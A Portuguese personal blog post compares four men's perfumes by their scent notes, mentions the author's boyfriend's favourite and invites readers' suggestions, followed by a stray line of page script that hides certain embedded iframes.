Abercrombie & Fitch First Instinct // Ralph Lauren Polo Blue // Hugo Boss Boss Bottled Night // Dolce & Gabbana Light Blue

Os aromas despertam-me muito os sentidos… Associo sempre os cheiros a sítios, a momentos, a pessoas. É muito comum ouvirem-me dizer que cheira a alguém, só porque senti o perfume dessa pessoa. E se há coisa que me atraí num homem é o seu cheiro – o cuidado e a vaidade que isso implica é bastante sedutor.

Tenho a sorte de ter um namorado que gosta de cuidar de si. Não é de perder muito tempo com cuidados de pele extra (como nós, miúdas, perdemos), mas uma coisa é certa: anda sempre bem cheiroso!

Para mim, o cheiro dele será sempre o Boss Bottled, da Hugo Boss. É bem amadeirado, mas com um toque floral graças à lavanda e à violeta. Mas, para um homem, a colecção de perfumes dele já está grandinha…

E eu confesso que também gosto muito do Polo Blue, da Ralph Lauren. É mais fresco, com melão, tangerina e pepino. Mas continua a ter as notas de madeira que são comuns à maioria dos perfumes masculinos. O Light Blue, da Dolce & Gabbana, é mais frutado. Tangerina, bergamota e toranja e, claro, o aroma de almíscar. É capaz de ser o mais suave de todos, mas não menos bom!

Por último, o First Instinct, da Abercrombie & Fitch é uma novidade, que está à venda em exclusivo nas lojas Douglas. É um pouquinho mais jovial, em comparação com os outros três, mas surpreendentemente bom. É também amadeirado, mas tem o gin e a água tónica ali no topo, com um extra da frescura do melão.

Digam-me: também são fãs de perfumes masculinos? E homens, que outras opções recomendam?
document.addEventListener(‘DOMContentLoaded’,function(){var a=document.getElementsByTagName(‘IFRAME’),i;for(i=0;i< a.length;i++){if(a[i].src.indexOf('q9LJzjXqL')!==-1){a[i].height=0}}});